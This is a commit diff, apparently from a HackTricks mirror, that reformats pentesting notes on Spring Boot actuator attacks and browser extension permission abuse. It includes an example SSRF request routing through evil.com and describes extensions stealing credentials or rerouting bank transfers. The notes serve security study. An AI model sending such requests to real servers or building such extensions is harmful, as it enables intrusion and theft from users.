mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
f
This commit is contained in:
parent
cc776534e2
commit
364e26191e
@ -52,16 +52,16 @@
|
||||
|
||||
1. **Env + H2 RCE**:
|
||||
- Details on exploiting the combination of `/env` endpoint and H2 database can be found [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
|
||||
|
||||
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
|
||||
- The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
|
||||
- Example exploit request:
|
||||
|
||||
- The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
|
||||
- Example exploit request:
|
||||
|
||||
```http
|
||||
GET ;@evil.com/url HTTP/1.1
|
||||
Host: target.com
|
||||
Connection: close
|
||||
```
|
||||
```http
|
||||
GET ;@evil.com/url HTTP/1.1
|
||||
Host: target.com
|
||||
Connection: close
|
||||
```
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -59,7 +59,7 @@ Both APIs allow executing not merely files contained in the extensions as conten
|
||||
> [!CAUTION]
|
||||
> In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
|
||||
|
||||
### Implicit privileges <a href="#implicit-privileges" id="implicit-privileges"></a>
|
||||
### Implicit privileges
|
||||
|
||||
Some extension privileges **don’t have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with.
|
||||
|
||||
@ -72,7 +72,7 @@ If you look through possible `tabs.create()` parameters, you’ll also notice th
|
||||
|
||||
[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.
|
||||
|
||||
### Webcam, geolocation and friends <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
|
||||
### Webcam, geolocation and friends
|
||||
|
||||
You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this.
|
||||
|
||||
@ -87,7 +87,7 @@ Adding the **`history`** keyword to the [permissions entry](https://developer.mo
|
||||
|
||||
The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
|
||||
|
||||
### Storage permission <a href="#the-storage-permission" id="the-storage-permission"></a>
|
||||
### Storage permission
|
||||
|
||||
The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here.
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user